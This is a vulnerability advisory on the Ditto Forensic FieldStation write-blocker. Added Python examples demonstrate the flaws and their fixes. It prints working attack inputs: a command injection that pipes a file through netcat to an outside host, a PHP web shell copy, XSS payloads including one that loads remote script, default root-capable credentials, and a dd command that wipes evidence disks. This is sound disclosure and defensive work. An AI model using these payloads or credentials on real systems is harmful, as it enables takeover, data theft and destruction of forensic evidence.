**************************************************************
Title: Ditto Forensic FieldStation, multiple vulnerabilities
Versions affected: <= 2013Oct15a (all)
Vendor: CRU Wiebetech
Discovered by: Martin Wundram
Email: wundram@digitrace.de
Date found: 2013-04-22
Date published: 2013-12-12
Status: partially patched
**************************************************************


0] ======== Introduction / Background / Impact ========
In computer forensics (http://en.wikipedia.org/wiki/Computer_forensics) one
essential requirement is that evidence data is not modified at all (or at
least not unnoticed). Therefore IT forensic experts use write-blockers to
ensure read-only access to evidence data such as hard disks or USB mass
storage.

The Ditto Forensic FieldStation is such a piece of special equipment (hardware
with embedded software) used by forensic experts to analyse and copy evidence
data in a safe and secure way. The Ditto is explicitly marketed as a device
that can also acquire data from network file shares. This means it is meant to
be connected to the possibly hostile networks of suspects.

However, it was found to be vulnerable to the point of not being reliable as a
computer forensic device.


1] ======== OS Command Injection ========
Class: Command Injection [CWE-77]
Impact: Code execution (as root, see 4])
Remotely Exploitable: Yes
CVE Name: CVE-2013-6881
CVSS v2 Base Score: 10
Overall CVSS v2 Score: 9.2
CVSS v2 Vector:
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)

Several input fields of the web application are vulnerable to OS command
injection. For example, the application lets the user set parameters such as
'sector size' or 'skip count' for a forensic imaging task. Because these
values are not properly neutralized before they are used in an OS command,
and because the web server runs with root privileges (see 4]), an attacker is
able to access and manipulate the complete system.

Example 1 (setting 'sector size' = 1 with a command appended; the injected
command sends the application's index.php to an attacker-controlled host, using
the netcat binary that is present on the device, see 5]):

1;cat /opt/web/htdocs/index.php | nc 192.168.1.1 6666;

Example 2 (setting 'set-size' = 1 with a command appended that copies a PHP
shell from the external SD card into the web root):

1;cp /ditto/shell.php /opt/web/htdocs;


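The following is an added example, not code from this advisory or from the Ditto firmware. It shows why a numeric form field such as 'sector size' becomes a command injection when it is interpolated into a shell string, and the two-step hardening (strict validation, then an argv list with no shell) that the advisory's "improper neutralization" refers to. The shape of the imaging command, the 1 MiB upper bound and the use of printf in place of the real imaging tool are assumptions made so the demo runs harmlessly; the payload is the advisory's example 1 with the network pipe replaced by a harmless marker.

```python
"""Command injection through an unneutralized 'sector size' field, and the
hardened form. Added example; the command shape and bounds are assumptions."""
import re
import subprocess

# The advisory's example 1 payload, with "cat ... | nc ..." swapped for a
# harmless marker command so this runs offline.
PAYLOAD = "1;echo INJECTED;"


def build_command_vulnerable(sector_size: str) -> str:
    """Interpolate the raw form value into a shell string (the flaw).

    Assumed shape of the original command. The field is inserted unquoted, so
    ';' terminates the intended command and starts the attacker's.
    """
    return "printf 'bs=%s\\n' " + sector_size


def run_vulnerable(sector_size: str) -> str:
    """Run the string through /bin/sh, as the vulnerable application does."""
    result = subprocess.run(build_command_vulnerable(sector_size),
                            shell=True, capture_output=True, text=True)
    return result.stdout


def parse_sector_size(value: str) -> int:
    """Hardened input handling: accept only a bounded positive integer.

    Rejecting anything that is not a short digit string means shell
    metacharacters never reach a command line at all.
    """
    if not re.fullmatch(r"[0-9]{1,7}", value):
        raise ValueError(f"invalid sector size: {value!r}")
    size = int(value)
    if size == 0 or size > 1 << 20:   # assumed sane upper bound (1 MiB)
        raise ValueError(f"sector size out of range: {size}")
    return size


def run_hardened(sector_size: str) -> str:
    """Validate first, then pass an argv list: no shell ever parses the value."""
    size = parse_sector_size(sector_size)
    result = subprocess.run(["printf", "bs=%s\n", str(size)],
                            capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    print("vulnerable:", run_vulnerable(PAYLOAD).strip())
    try:
        run_hardened(PAYLOAD)
    except ValueError as exc:
        print("hardened  :", exc)
    print("hardened  :", run_hardened("512").strip())
```

Run stand-alone, the vulnerable path prints "INJECTED" after the expected bs= line, while the hardened path refuses the payload before any process is spawned. Validation is the primary control; the argv list is defence in depth for the case where a future field is allowed to carry non-numeric content.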
2] ======== Persistent XSS ========
Class: Cross-site Scripting [CWE-79]
Impact: Code execution (script execution in the browser of every user)
Remotely Exploitable: Yes
Status: unpatched
CVE Name: CVE-2013-6882
CVSS v2 Base Score: 9
Overall CVSS v2 Score (if patched): 9.2
CVSS v2 Vector:
(AV:N/AC:L/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
Overall CVSS v2 Score (unpatched): 10

The web application suffers from multiple XSS vulnerabilities. The first one
(a) is critical because an unauthenticated attacker is able to push malicious
code into the system and consequently attack every user. The other ones (b)
require authentication first.

a) The web application logs every login attempt (including the submitted
username) unsanitized to a system log. Additionally, the web application
embeds that system log, rendered as HTML, into the start page of every user
who successfully logs in. Thus an unauthenticated attacker can persistently
inject malicious code which attacks all users of the vulnerable system
immediately after their login.

Example (login request; the username decodes to
demo<script>alert(1);</script>):

POSTDATA=
user=demo%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
&pass=demo&login=Log+In

b) It is easily possible to submit malicious data into multiple HTML form
fields (e.g. one can force the system to load externally hosted JavaScript
code with <script src=http://www.hacker.tld/code.js></script>). This can
result in dangerous situations where the (external) JavaScript code mangles
the information displayed about key computer forensic values whose integrity
is crucial.

Example of falsified display values:
784 PetaByte (PB) source disk instead of 32 GB, investigator "Al Capone",
"verify actions: yes" instead of "no", ...


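The following is an added example, not code from this advisory or from the Ditto firmware. It decodes the advisory's own POSTDATA from 2a), writes the username into a log line, and renders that log into a start page once the way the flaw does (raw) and once with output escaping. The log line format and the page template are assumptions; the request body is the one printed above.

```python
"""Persistent XSS through an unescaped login log, and the output-escaping fix.
Added example; log format and page template are assumptions."""
import html
from urllib.parse import parse_qs

# The advisory's example request body (2a).
POSTDATA = ("user=demo%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E"
            "&pass=demo&login=Log+In")


def username_from_post(body: str) -> str:
    """Decode the form body the way the login handler would."""
    return parse_qs(body, keep_blank_values=True)["user"][0]


def log_login_attempt(username: str, ok: bool) -> str:
    """Assumed syslog-style line written for every login attempt."""
    status = "success" if ok else "failure"
    return f"ditto-web: login {status} for user {username}"


def render_start_page_vulnerable(log_lines: list[str]) -> str:
    """Embed the raw log in HTML (the flaw): the payload is parsed as markup
    by every browser that loads the start page."""
    body = "<br>".join(log_lines)
    return f"<html><body><h1>Recent logins</h1><p>{body}</p></body></html>"


def render_start_page_fixed(log_lines: list[str]) -> str:
    """Escape each line at output time; the browser now shows the text."""
    body = "<br>".join(html.escape(line, quote=True) for line in log_lines)
    return f"<html><body><h1>Recent logins</h1><p>{body}</p></body></html>"


def contains_live_script(page: str) -> bool:
    """Crude check used by the demo: does the page carry a real <script> tag?"""
    return "<script>" in page


if __name__ == "__main__":
    user = username_from_post(POSTDATA)   # demo<script>alert(1);</script>
    log = [log_login_attempt("investigator", True),
           log_login_attempt(user, False)]
    print(render_start_page_vulnerable(log))
    print(render_start_page_fixed(log))
```

The fix belongs at the point where log text is turned into HTML, not only at the point where it is logged: the log is also read by other tools, and a failed login must still be recorded verbatim for audit purposes. Escaping at render time keeps the evidence of the attack in the log while making it inert in the page.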
3] ======== Cross-Site Request Forgery ========
Class: Cross-Site Request Forgery [CWE-352]
Impact: Application misuse
Remotely Exploitable: Yes
CVE Name: CVE-2013-6883
CVSS v2 Base Score: 6.6
Overall CVSS v2 Score: 8
CVSS v2 Vector:
(AV:N/AC:H/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)

The web application does not protect state-changing requests against
Cross-Site Request Forgery. For example, the disk erase technique (the correct
setting is important for the reliable deletion of sensitive forensic data) can
be changed with a single forged POST request sent by any web page that an
authenticated user happens to visit.


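The following is an added example, not code from this advisory or from the Ditto firmware. It shows a synchronizer token check of the kind that would have rejected the forged erase-technique POST: the token is an HMAC of the session identifier under a server secret, emitted into the application's own form and verified on every state-changing request. The session store, the form field names and the erase technique names are assumptions.

```python
"""CSRF protection for a state-changing form (erase technique), as a session-
bound HMAC token. Added example; field and technique names are assumptions."""
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)          # assumed per-boot secret
ALLOWED_TECHNIQUES = {"single-pass", "multi-pass"}  # assumed setting values


def csrf_token(session_id: str) -> str:
    """Derive a token bound to the session; no per-form server state needed.

    A forging page can make the victim's browser send the session cookie, but
    it cannot read this value, so it cannot include it in the forged POST.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_erase_settings(session_id: str, form: dict) -> str:
    """Assumed handler for the erase-technique form.

    Returns the stored technique, or raises PermissionError when the request
    carries no valid token (the shape of a cross-site forged request).
    """
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token(session_id)):
        raise PermissionError("missing or invalid CSRF token")
    technique = form.get("erase_technique", "")
    if technique not in ALLOWED_TECHNIQUES:
        raise ValueError(f"unknown erase technique: {technique!r}")
    return technique


if __name__ == "__main__":
    sid = "session-of-investigator"
    # Legitimate request: the application's own form carried the token.
    legit = {"erase_technique": "single-pass", "csrf_token": csrf_token(sid)}
    print("stored:", handle_erase_settings(sid, legit))
    # Forged request: the cookie rides along, the token is absent.
    forged = {"erase_technique": "single-pass"}
    try:
        handle_erase_settings(sid, forged)
    except PermissionError as exc:
        print("rejected:", exc)
```

Two details matter in practice: the comparison uses hmac.compare_digest so a token cannot be guessed byte by byte through timing, and the token is only as secret as the session identifier, so the check is only meaningful once the session cookie itself is unguessable and the XSS in 2] is fixed (script running in the page can read the token from the form).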
4] ======== Misconfigured Daemon Rights ========
Class: Configuration [CWE-16]
Impact: Full system access

The web server lighttpd and the PHP engine run as user 'root'. Thus injection
weaknesses in the 'ditto' web application (see 1]) result in immediate full
system access.


5] ======== Unneeded Daemons/Software ========
Class: Configuration [CWE-16]
Impact: Attackable services
Best matching CCE-ID: CCE-4268-9

Forensic usage needs only write-blocking and imaging of evidence data.
However, the base system contains further active software and services, which
help an attacker to compromise the system and escalate privileges. In
particular, netcat is installed and an SSH daemon is active. Furthermore, the
SSH daemon binds to the network port labeled 'source', which is intended for
use in supposedly hostile network environments: the network containing
evidence data from suspects.


6] ======== Use of standard credentials ========
Class: Use of Hard-coded Credentials [CWE-798]
Impact: Unwanted full system access
Remotely Exploitable: Yes
CVE Name: CVE-2013-6884
CVSS v2 Base Score: 10
Overall CVSS v2 Score: 9.2
CVSS v2 Vector:
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)

The Ditto write-blocker contains a default system user named 'ditto' with the
default password 'ditto', which is allowed to elevate its rights to root
(sudo) without further authentication. In combination with the active SSH
daemon (see 5]), this vulnerability gives attackers full access to the Ditto
as soon as it is connected to a network they can reach.


7] ======== Misconfigured Core System ========
Class: Configuration [CWE-16]
Impact: Alteration of evidence data
Remotely Exploitable: Yes

Although explicitly marketed as a hardware write-blocker, the Ditto does not
implement any specific write-blocking mechanism at all. The underlying system
is able to manipulate or even erase evidence on devices connected to the
'source side' of the Ditto. The problem is that no hardware-level, no
driver-level and no kernel-level (block device) write-blocking is implemented.
Only the web application prevents the user from writing to the source media.
That is an application-level convention, not a write-blocker. Consequently,
every critical weakness or simple malfunction in the web application can
potentially lead to overwriting of source/evidence data.

Furthermore, the embedded Linux system mounts its own system partition
writable. Thus malware can be persistently deployed!

Example:
With a shell on the device (see 1] or 6]), one can simply overwrite supposedly
write-protected source data (USB stick and SATA disk) with

dd if=/dev/zero of=/dev/sda

where /dev/sda is the device node of the source medium.


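The following is an added example, not code from this advisory or from the Ditto firmware. It implements the two kernel-level checks this section says are absent: a parser for /proc/mounts that reports whether the root file system is mounted writable (a constructed sample is embedded so it runs anywhere), and a function that flags a block device read-only with the BLKROSET ioctl, the same operation as `blockdev --setro`, and reads the flag back with BLKROGET. The device path is an assumption; the ioctl part only does something useful when run as root on Linux against a real block device.

```python
"""Kernel-level controls missing from the Ditto: a writable-root check over
/proc/mounts and a BLKROSET read-only flag on the source block device.
Added example; the device path is an assumption."""
import fcntl
import struct
import sys

BLKROSET = 0x125D   # Linux ioctl number, _IO(0x12, 93): set read-only flag
BLKROGET = 0x125E   # _IO(0x12, 94): get read-only flag

# Constructed sample of /proc/mounts from a system whose root is writable.
SAMPLE_PROC_MOUNTS = """\
rootfs / rootfs rw 0 0
/dev/mmcblk0p2 / ext4 rw,relatime,data=ordered 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
/dev/mmcblk0p1 /boot vfat ro,relatime 0 0
"""


def mount_options(proc_mounts: str, mountpoint: str) -> list[str]:
    """Return the option list of the last mount entry for mountpoint
    (the last entry is the one currently visible, like the kernel's view)."""
    opts: list[str] = []
    for line in proc_mounts.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[1] == mountpoint:
            opts = fields[3].split(",")
    return opts


def check_root_fs_writable(proc_mounts: str) -> bool:
    """True when / is mounted rw, i.e. malware can persist across reboots."""
    return "rw" in mount_options(proc_mounts, "/")


def set_block_device_readonly(path: str) -> bool:
    """Flag a block device read-only in the kernel and read the flag back.

    Unlike the Ditto's web-layer check, this makes the kernel refuse to open
    the device node for writing (EROFS) for every process, including a root
    shell obtained through 1] or 6]. It is still no substitute for a hardware
    write-blocker: root can clear the flag again, and nothing protects the
    medium before this code has run.
    """
    with open(path, "rb") as dev:
        fcntl.ioctl(dev.fileno(), BLKROSET, struct.pack("i", 1))
        raw = fcntl.ioctl(dev.fileno(), BLKROGET, struct.pack("i", 0))
        flag = struct.unpack("i", raw)[0]
    return flag == 1


if __name__ == "__main__":
    print("root fs writable in sample:",
          check_root_fs_writable(SAMPLE_PROC_MOUNTS))
    if len(sys.argv) > 1:          # e.g. /dev/sda, the source-side device
        print("read-only:", set_block_device_readonly(sys.argv[1]))
```

Two caveats for anyone using the read-only flag as a stop-gap: set it on every device node you expose (whole disk and each partition), because older kernels did not propagate the whole-disk flag to partition nodes, and verify it with BLKROGET or `blockdev --getro` after every hot-plug, since the flag belongs to the kernel's device object and is gone when the device is re-enumerated. Mounting the root file system read-only addresses the second finding in this section (persistence), not the first.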
8] ======== Solution ========
Upgrade your Ditto to the newest available firmware (2013Oct15a), which fixes
some but not all of the issues described above (see 9]). Do not connect the
device to potentially hostile networks. Examine your device for earlier
manipulation: has someone placed a backdoor in the embedded Linux, or malware
which silently manipulates evidence data or copies of evidence data?


9] ======== Report Timeline ========
2013-04-22 Discovery of vulnerabilities
2013-04-23 First contact with vendor, including agreement about later public
           disclosure
2013-04-26 Detailed information about vulnerabilities provided to vendor
2013-06-30 Vendor fixes some vulnerabilities with firmware 2013Jun30a
2013-10-15 Vendor fixes some vulnerabilities with firmware 2013Oct15a
2013-11-26 Information with details provided to vendor about upcoming public
           disclosure. Vendor gave feedback regarding technical accuracy of
           this report
2013-12-12 Public disclosure


10] ======== Discussion ========
Because integrity is of utmost importance during the forensic process (correct
handling of evidence data and correct deduction of conclusions and
implications), even small vulnerabilities in forensic tools and devices become
critical.


11] ======== References ========
a) http://www.cru-inc.com/support/software-downloads/ditto-firmware-updates/ditto-firmware-release-notes-2013oct15a/
b) http://www.cru-inc.com/support/software-downloads/ditto-firmware-updates/ditto-firmware-release-notes-2013jun30a/


--
Diplom-Wirtschaftsinformatiker Martin G. Wundram

DigiTrace GmbH - Competence in IT forensics
Managing directors: Alexander Sigel, Martin Wundram
Register court: Köln, HRB 72919
VAT ID: DE278529699

Zollstockgürtel 59, 50969 Köln
Phone: 0221-6 77 86 95-0
Website: www.DigiTrace.de
E-Mail: info@DigiTrace.de